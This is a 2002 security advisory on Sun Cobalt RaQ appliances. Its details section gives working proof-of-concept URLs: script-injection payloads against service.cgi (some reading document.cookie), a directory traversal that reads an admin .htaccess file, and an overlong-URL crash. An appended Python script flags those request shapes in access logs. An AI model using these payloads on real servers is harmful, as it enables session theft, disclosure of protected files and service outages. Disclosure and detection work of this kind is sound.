
Advisories

SYBSEC-ADV12: Sun Cobalt RaQ Directory Traversal File Reading Vulnerability

Title: Sun Cobalt RaQ Directory Traversal File Reading Vulnerability
ID: SYBSEC-ADV12
Severity: HIGH - Directory Traversal File Reading Vulnerability
History:
20.FEB.2002 Vulnerability discovered
28.FEB.2002 Vendor contacted
Scope: Directory Traversal File Reading Vulnerability
Platforms: Sun Cobalt RaQ
Author:
URL: http://www.sybsecurity.com/advisors/SYBSEC-ADV12-Sun_Cobalt_RaQ_Directory_Traversal_File_Reading_Vulnerability
Release: Public
Overview
RaQ is a server appliance originally developed by Cobalt. It is now distributed and maintained by Sun Microsystems.
Affected versions
The vulnerability has been reported in the following Cobalt server versions:

Cobalt RaQ 4.0
Cobalt RaQ 3.0
Cobalt RaQ 2.0
Description
The Cobalt RaQ appliances are vulnerable to a directory traversal attack. Using this attack, a remote user can read sensitive configuration files, such as .htaccess files, which could potentially result in unauthorized access to restricted information. It is unknown whether this attack will permit escape of the HTTP root directory.
Workaround
Upgrade to the software version that you can download from:
http://www.sun.com
Acknowledgments
This vulnerability has been found and researched by:
- Alex Hernandez <ahernandez [at] sybsecurity [dot] com>
References
Details
"
EXAMPLES:

http://10.0.0.1:81/cgi-bin/.cobalt/alert/service.cgi?service=<h1>Hello!</h1><script>alert('hello')</script>
http://10.0.0.1:81/cgi-bin/.cobalt/alert/service.cgi?service=<script>alert('Microsoft hole')</script>
http://10.0.0.1:81/cgi-bin/.cobalt/alert/service.cgi?service=<img src=javascript:alert(document.domain)>
http://10.0.0.1:81/cgi-bin/.cobalt/alert/service.cgi?service=<script>alert(document.cookie)</script>

LOCATION:
http://10.0.0.1:81/cgi-bin/.cobalt/alert/service.cgi?service=%3Cscript%3Ealert(document.location)%3C/script%3E

COOKIES:
http://10.0.0.1:81/cgi-bin/.cobalt/alert/service.cgi?service=%3Cscript%3Ealert(document.cookie)%3C/script%3E

TAG IMAGES:
http://10.0.0.1:81/cgi-bin/.cobalt/alert/service.cgi?service=<img src=javascript:alert(document.domain)>

WRITE ON DOCUMENT:
http://10.0.0.1:81/cgi-bin/.cobalt/alert/service.cgi?service=<SCRIPT>document.write(document.domain)</SCRIPT>

------oOo--------

Traversal File configuration.

Exploit:
http://10.0.0.1:81/.cobalt/sysManage/../admin/.htaccess

# Access file for /usr/admserv/html/.cobalt/admin/ (admin )
order allow,deny
allow from all
require user admin
Authname CobaltRaQ
Authtype Basic

The default directory on the server is "/usr/admserv/html/.cobalt/admin". The same traversal can be pointed at any directory to capture restricted files, passwords and user profiles.

------oOo--------

Denial of service.

Proof of concept:

The server crashes after receiving a very long URL:

Example:

http://10.0.0.1:81/cgi-bin/.cobalt/alert/service.cgi?service=/AAAAAAAAA...(Ax100000)...AAA

The system crashes and the administrator needs to restart the service. "
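
A log-review check for the three request shapes listed in the details above (markup in the service parameter, ".." path segments reaching .htaccess, and an overlong URL), given here as an added example that is not part of the original advisory. The log format, the sample lines, the finding names and the 2048-character limit are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, unquote, parse_qsl

MAX_URL_LEN = 2048  # assumed limit; set it above the longest legitimate URL you serve
MARKUP = re.compile(r"<\s*/?\s*[a-z!]|javascript:", re.I)  # tag-like text or a javascript: URI
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def classify(target):
    """Return the set of findings for one request target (path plus query)."""
    findings = set()
    if len(target) > MAX_URL_LEN:
        findings.add("overlong-url")
    parts = urlsplit(target)
    segments = unquote(parts.path).split("/")  # decode first so %2e%2e is caught too
    if ".." in segments:
        findings.add("traversal")
    if segments[-1].lower().startswith(".ht"):
        findings.add("htaccess-read")
    for _, value in parse_qsl(parts.query, keep_blank_values=True):
        if MARKUP.search(value):
            findings.add("markup-in-parameter")
    return findings

def scan(log_lines):
    """Return [(line_number, findings)] for every log line with a finding."""
    hits = []
    for number, line in enumerate(log_lines, 1):
        match = REQUEST.search(line)
        found = classify(match.group(1)) if match else set()
        if found:
            hits.append((number, found))
    return hits

# Constructed access-log lines (common log format) built from the advisory's request shapes.
PREFIX = '10.0.0.9 - - [01/Mar/2002:10:00:00 +0000] '
CGI = "/cgi-bin/.cobalt/alert/service.cgi?service="
SAMPLE_LOG = [
    PREFIX + '"GET /index.html HTTP/1.0" 200 512',
    PREFIX + '"GET /.cobalt/sysManage/../admin/.htaccess HTTP/1.0" 200 141',
    PREFIX + '"GET ' + CGI + '%3Cscript%3Ealert(document.cookie)%3C/script%3E HTTP/1.0" 200 300',
    PREFIX + '"GET ' + CGI + "/" + "A" * 100000 + ' HTTP/1.0" 500 0',
]

if __name__ == "__main__":
    for number, found in scan(SAMPLE_LOG):
        print(number, sorted(found))
```

A 200 status on a line flagged "htaccess-read" means the file content was served and the credentials or access rules it protects should be treated as disclosed.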
Exploit tool